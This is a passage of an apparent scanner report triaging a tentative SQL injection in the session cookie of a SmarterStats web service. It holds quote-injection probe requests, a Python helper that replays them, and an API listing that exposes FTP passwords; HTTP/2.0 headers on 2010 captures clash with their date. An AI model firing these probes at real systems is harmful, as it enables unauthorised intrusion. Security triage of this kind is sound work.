<pre>GET /Services/SiteAdmin.asmx/AddSiteWithFTP2?<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>soUserName</font>=<font class=value>string</font>&amp;<font class=key>soPassword</font>=<font class=value>string</font>&amp;<font class=key>soFirstName</font>=<font class=value>string</font>&amp;<font class=key>soLastName</font>=<font class=value>string</font>&amp;<font class=key>ServerID</font>=<font class=value>string</font>&amp;<font class=key>SiteID</font>=<font class=value>string</font>&amp;<font class=key>DomainName</font>=<font class=value>string</font>&amp;<font class=key>LogFormat</font>=<font class=value>string</font>&amp;<font class=key>LogWildcard</font>=<font class=value>string</font>&amp;<font class=key>LogDaysBeforeDelete</font>=<font class=value>string</font>&amp;<font class=key>SmarterLogDirectory</font>=<font class=value>string</font>&amp;<font class=key>SmarterLogMonthsBeforeDelete</font>=<font class=value>string</font>&amp;<font class=key>ExportPath</font>=<font class=value>string</font>&amp;<font class=key>ExportPathURL</font>=<font class=value>string</font>&amp;<font class=key>TimeZoneIndex</font>=<font class=value>string</font>&amp;<font class=key>Directory</font>=<font class=value>string</font>&amp;<font class=key>ProxyType</font>=<font class=value>string</font>&amp;<font class=key>ProxyAddress</font>=<font class=value>string</font>&amp;<font class=key>ProxyPort</font>=<font class=value>string</font>&amp;<font class=key>ProxyUserName</font>=<font class=value>string</font>&amp;<font class=key>ProxyPassword</font>=<font class=value>string</font>&amp;<font class=key>Server</font>=<font class=value>string</font>&amp;<font class=key>Port</font>=<font class=value>string</font>&amp;<font class=key>Username</font>=<font class=value>string</font>&amp;<font class=key>Password</font>=<font class=value>string</font>&amp;<font 
class=key>IntervalHours</font>=<font class=value>string</font> HTTP/1.1
Host: localhost
</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;GenericResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/GenericResult&gt;</pre>
</span>

<span>
<h3>HTTP POST</h3>
<p>The following is a sample HTTP POST request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx/AddSiteWithFTP2 HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: <font class=value>length</font>

<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>soUserName</font>=<font class=value>string</font>&amp;<font class=key>soPassword</font>=<font class=value>string</font>&amp;<font class=key>soFirstName</font>=<font class=value>string</font>&amp;<font class=key>soLastName</font>=<font class=value>string</font>&amp;<font class=key>ServerID</font>=<font class=value>string</font>&amp;<font class=key>SiteID</font>=<font class=value>string</font>&amp;<font class=key>DomainName</font>=<font class=value>string</font>&amp;<font class=key>LogFormat</font>=<font class=value>string</font>&amp;<font class=key>LogWildcard</font>=<font class=value>string</font>&amp;<font class=key>LogDaysBeforeDelete</font>=<font class=value>string</font>&amp;<font class=key>SmarterLogDirectory</font>=<font class=value>string</font>&amp;<font class=key>SmarterLogMonthsBeforeDelete</font>=<font class=value>string</font>&amp;<font class=key>ExportPath</font>=<font class=value>string</font>&amp;<font class=key>ExportPathURL</font>=<font class=value>string</font>&amp;<font class=key>TimeZoneIndex</font>=<font class=value>string</font>&amp;<font class=key>Directory</font>=<font class=value>string</font>&amp;<font class=key>ProxyType</font>=<font class=value>string</font>&amp;<font class=key>ProxyAddress</font>=<font class=value>string</font>&amp;<font class=key>ProxyPort</font>=<font class=value>string</font>&amp;<font class=key>ProxyUserName</font>=<font class=value>string</font>&amp;<font class=key>ProxyPassword</font>=<font class=value>string</font>&amp;<font class=key>Server</font>=<font class=value>string</font>&amp;<font class=key>Port</font>=<font class=value>string</font>&amp;<font class=key>Username</font>=<font class=value>string</font>&amp;<font class=key>Password</font>=<font class=value>string</font>&amp;<font class=key>IntervalHours</font>=<font class=value>string</font></pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;GenericResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/GenericResult&gt;</pre>
</span>

</span>
</body>
</html>

2.7. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [ASP.NET_SessionId cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/SiteAdmin.asmx

Issue detail

The ASP.NET_SessionId cookie was flagged as a possible SQL injection point. A single quote was submitted in the ASP.NET_SessionId cookie and a general error (HTTP 500) was returned; two single quotes were then submitted and the error disappeared. The Tentative confidence is warranted: the error page in Response 1 is a System.Xml.Schema.XmlSchemaException raised in ASP.defaultwsdlhelpgenerator_aspx.Page_Load while the .asmx help page was being rendered and WS-I conformance was being checked, and nothing in the stack trace references a database driver. ASP.NET itself does not build SQL from the session cookie (its SQL Server session-state provider calls parameterized stored procedures), so a genuine finding here would require application code that reads the cookie and concatenates it into a query. A 500/200 differential is only a signal: review the exception type on the error page, repeat the request pair to rule out an intermittent help-page failure, and test the application's other inputs before treating this as an injection. Note also that the GetSiteStatus help page returned in Response 2 shows the operation takes authUserName and authPassword as plain GET or POST parameters and returns ftp_Password and ftp_ProxyPassword in its result, so any real injection on this endpoint would carry high impact.
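The scanner's 500-then-200 differential is the entire basis of this finding, so the first triage step is to classify what produced the 500. The Python script below is an added example, not part of the scanner output or of SmarterStats: it reads the exception type and stack frames out of an ASP.NET error page and separates a database-driver exception from an unrelated one. It embeds a trimmed copy of Response 1 and a constructed SqlException page for contrast; the exception-type list and the probe_session_cookie helper (which replays the report's cookie pair against a URL you supply, and is the only part that touches the network) are assumptions for illustration.

```python
import re
import urllib.error
import urllib.request
from dataclasses import dataclass
from typing import Optional, Tuple

# Trimmed copy of Response 1 from the report: the 500 page the scanner saw after a
# single quote was placed in ASP.NET_SessionId. Only the parts the triage reads are kept.
RESP1_BODY = """<html><head>
<title>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</title>
</head><body>
<b> Exception Details: </b>System.Xml.Schema.XmlSchemaException: Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.<br><br>
<b>Stack Trace:</b> <br><br>
<code><pre>
[XmlSchemaException: Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.]
System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e) +26
ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e) +2222
</pre></code></body></html>"""

# Constructed for contrast, not taken from the report: the same ASP.NET error page
# when the exception really does come from the SQL Server driver.
SQL_BODY = """<html><head><title>Unclosed quotation mark after the character string ''.</title></head><body>
<b> Exception Details: </b>System.Data.SqlClient.SqlException: Unclosed quotation mark after the character string ''.<br><br>
<b>Stack Trace:</b> <br><br>
<code><pre>
[SqlException (0x80131904): Unclosed quotation mark after the character string ''.]
System.Data.SqlClient.SqlCommand.ExecuteReader() +86
</pre></code></body></html>"""

# Exception types that show the quote reached a database driver (assumed list).
DB_EXCEPTIONS = {
    "System.Data.SqlClient.SqlException",
    "System.Data.OleDb.OleDbException",
    "System.Data.Odbc.OdbcException",
    "MySql.Data.MySqlClient.MySqlException",
    "Oracle.DataAccess.Client.OracleException",
    "Npgsql.NpgsqlException",
}

_EXC_RE = re.compile(r"Exception Details:\s*</b>\s*([A-Za-z0-9_.]+):")
_FRAME_RE = re.compile(r"^\s*(System\.Data\.[A-Za-z0-9_.]+)\(", re.M)


def exception_type(body: str) -> Optional[str]:
    """Return the fully qualified exception type from an ASP.NET error page, if present."""
    m = _EXC_RE.search(body)
    return m.group(1) if m else None


def has_data_access_frame(body: str) -> bool:
    """True if the stack trace passes through System.Data (ADO.NET): a second SQL signal."""
    return _FRAME_RE.search(body) is not None


@dataclass
class Verdict:
    differential: bool        # 500 on ' and non-500 on ''
    exception: Optional[str]
    db_error: bool
    note: str


def triage(status_q: int, body_q: str, status_qq: int, body_qq: str) -> Verdict:
    """Apply the scanner's ' versus '' differential, then check what actually failed."""
    differential = status_q >= 500 and status_qq < 500
    exc = exception_type(body_q) if status_q >= 500 else None
    db_error = (exc in DB_EXCEPTIONS) or has_data_access_frame(body_q)
    if not differential:
        note = "no quote-sensitive differential"
    elif db_error:
        note = "database exception on a single quote: likely SQL injection"
    elif exc:
        note = "500 raised by %s, not a database driver: likely false positive" % exc
    else:
        note = "500 differential but no exception type visible: manual review"
    return Verdict(differential, exc, db_error, note)


def fetch(url: str, cookie: str) -> Tuple[int, str]:
    """One GET with the given Cookie header; returns (status, body) and keeps 500 bodies."""
    req = urllib.request.Request(url, headers={"Cookie": cookie, "Accept": "*/*"})
    try:
        with urllib.request.urlopen(req, timeout=10) as r:
            return r.status, r.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode("utf-8", "replace")


def probe_session_cookie(url: str, session_id: str) -> Verdict:
    """Replay the report's two requests (' then '') and triage the pair. Network; not run here."""
    base = "ASP.NET_SessionId=%s" % session_id
    sq, bq = fetch(url, base + "'")
    sqq, bqq = fetch(url, base + "''")
    return triage(sq, bq, sqq, bqq)


if __name__ == "__main__":
    print(triage(500, RESP1_BODY, 200, "<html>help page</html>").note)
```

Run against the captured pair, triage reports the 500 as raised by System.Xml.Schema.XmlSchemaException rather than a database driver, which is the reason to keep this item at Tentative until a quote in the cookie produces a data-access exception or a confirmed behavioural difference.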

Request 1

GET /Services/SiteAdmin.asmx?op=GetSiteStatus HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4'; loginsettings=;

Response 1

HTTP/2.0 500 Internal Server Error
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 02:36:45 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7512
Connection: Close

<html>
<head>
<title>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Xml.Schema.XmlSchemaException: Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:<br><br>1. Add a &quot;Debug=true&quot; directive at the top of the file that generated the error. Example:<br><br> &nbsp;&nbsp;&lt;%@ Page Language=&quot;C#&quot; Debug=&quot;true&quot; %&gt;<br><br>or:<br><br>2) Add the following section to the configuration file of your application:<br><br>&lt;configuration&gt;<br> &nbsp;&nbsp;&nbsp;&lt;system.web&gt;<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;compilation debug=&quot;true&quot;/&gt;<br> &nbsp;&nbsp;&nbsp;&lt;/system.web&gt;<br>&lt;/configuration&gt;<br><br> Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.<br><br>Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[XmlSchemaException: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.]
System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e) +26
System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType) +540
System.Xml.Schema.Compiler.Compile() +772
System.Xml.Schema.XmlSchemaSet.Compile() +742
System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile) +1109
System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas) +204
System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +190
System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +75
ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e) +2222
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +25
System.Web.UI.Control.LoadRecursive() +95
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2760
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1

</font>

</body>
</html>
<!--
[XmlSchemaException]: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.
at System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e)
at System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType)
at System.Xml.Schema.Compiler.Compile()
at System.Xml.Schema.XmlSchemaSet.Compile()
at System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile)
at System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas)
at System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type &#39;System.Web.HttpUnhandledException&#39; was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.Services.Protocols.DocumentationServerProtocol.WriteReturns(Object[] returnValues, Stream outputStream)
[InvalidOperationException]: The XML Web service help page encountered an internal error.
at System.Web.Services.Protocols.WebServiceHandler.WriteException(Exception e)
at System.Web.Services.Protocols.WebServiceHandler.CoreProcessRequest()
at System.Web.Services.Protocols.SyncSessionlessHandler.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
-->

Request 2

GET /Services/SiteAdmin.asmx?op=GetSiteStatus HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4''; loginsettings=;

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 02:36:45 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 19153
Connection: Close

<html>

<head><link rel="alternate" type="text/xml" href="/Services/SiteAdmin.asmx?disco" />

<style type="text/css">

       BODY { color: #000000; background-color: white; font-family: Verdana; margin-left: 0px; margin-top: 0px; }
       #content { margin-left: 30px; font-size: .70em; padding-bottom: 2em; }
       A:link { color: #336699; font-weight: bold; text-decoration: underline; }
       A:visited { color: #6699cc; font-weight: bold; text-decoration: underline; }
       A:active { color: #336699; font-weight: bold; text-decoration: underline; }
       A:hover { color: cc3300; font-weight: bold; text-decoration: underline; }
       P { color: #000000; margin-top: 0px; margin-bottom: 12px; font-family: Verdana; }
       pre { background-color: #e5e5cc; padding: 5px; font-family: Courier New; font-size: x-small; margin-top: -5px; border: 1px #f0f0e0 solid; }
       td { color: #000000; font-family: Verdana; font-size: .7em; }
       h2 { font-size: 1.5em; font-weight: bold; margin-top: 25px; margin-bottom: 10px; border-top: 1px solid #003366; margin-left: -15px; color: #003366; }
       h3 { font-size: 1.1em; color: #000000; margin-left: -15px; margin-top: 10px; margin-bottom: 10px; }
       ul { margin-top: 10px; margin-left: 20px; }
       ol { margin-top: 10px; margin-left: 20px; }
       li { margin-top: 10px; color: #000000; }
       font.value { color: darkblue; font: bold; }
       font.key { color: darkgreen; font: bold; }
       font.error { color: darkred; font: bold; }
       .heading1 { color: #ffffff; font-family: Tahoma; font-size: 26px; font-weight: normal; background-color: #003366; margin-top: 0px; margin-bottom: 0px; margin-left: -30px; padding-top: 10px; padding-bottom: 3px; padding-left: 15px; width: 105%; }
       .button { background-color: #dcdcdc; font-family: Verdana; font-size: 1em; border-top: #cccccc 1px solid; border-bottom: #666666 1px solid; border-left: #cccccc 1px solid; border-right: #666666 1px solid; }
       .frmheader { color: #000000; background: #dcdcdc; font-family: Verdana; font-size: .7em; font-weight: normal; border-bottom: 1px solid #dcdcdc; padding-top: 2px; padding-bottom: 2px; }
       .frmtext { font-family: Verdana; font-size: .7em; margin-top: 8px; margin-bottom: 0px; margin-left: 32px; }
       .frmInput { font-family: Verdana; font-size: 1em; }
       .intro { margin-left: -15px; }

</style>

<title>
   SiteAdmin Web Service
</title></head>

<body>

<div id="content">

<p class="heading1">SiteAdmin</p><br>





<span>
<p class="intro">Click <a href="SiteAdmin.asmx">here</a> for a complete list of operations.</p>
<h2>GetSiteStatus</h2>
<p class="intro">Returns the status for one site listed in the MRS.</p>

<h3>Test</h3>

To test the operation using the HTTP POST protocol, click the 'Invoke' button.



<form target="_blank" action='http://localhost:9999/Services/SiteAdmin.asmx/GetSiteStatus' method="POST">

<table cellspacing="0" cellpadding="4" frame="box" bordercolor="#dcdcdc" rules="none" style="border-collapse: collapse;">
<tr>
   <td class="frmHeader" background="#dcdcdc" style="border-right: 2px solid white;">Parameter</td>
   <td class="frmHeader" background="#dcdcdc">Value</td>
</tr>


<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authUserName:</td>
<td><input class="frmInput" type="text" size="50" name="authUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authPassword:</td>
<td><input class="frmInput" type="text" size="50" name="authPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">SiteID:</td>
<td><input class="frmInput" type="text" size="50" name="SiteID"></td>
</tr>

<tr>
<td></td>
<td align="right"> <input type="submit" value="Invoke" class="button"></td>
</tr>
</table>


</form>
<span>
<h3>SOAP 1.1</h3>
<p>The following is a sample SOAP 1.1 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>
SOAPAction: "http://www.smartertools.com/smarterstats/SiteAdmin.asmx/GetSiteStatus"

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;GetSiteStatus xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;/GetSiteStatus&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;GetSiteStatusResponse xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;GetSiteStatusResult&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Site&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogDirectory&gt;<font class=value>string</font>&lt;/LogDirectory&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/Site&gt;
&lt;/GetSiteStatusResult&gt;
&lt;/GetSiteStatusResponse&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>
</span>

<span>
<h3>SOAP 1.2</h3>
<p>The following is a sample SOAP 1.2 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;GetSiteStatus xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;/GetSiteStatus&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;GetSiteStatusResponse xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;GetSiteStatusResult&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Site&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogDirectory&gt;<font class=value>string</font>&lt;/LogDirectory&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/Site&gt;
&lt;/GetSiteStatusResult&gt;
&lt;/GetSiteStatusResponse&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>
</span>

<span>
<h3>HTTP GET</h3>
<p>The following is a sample HTTP GET request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

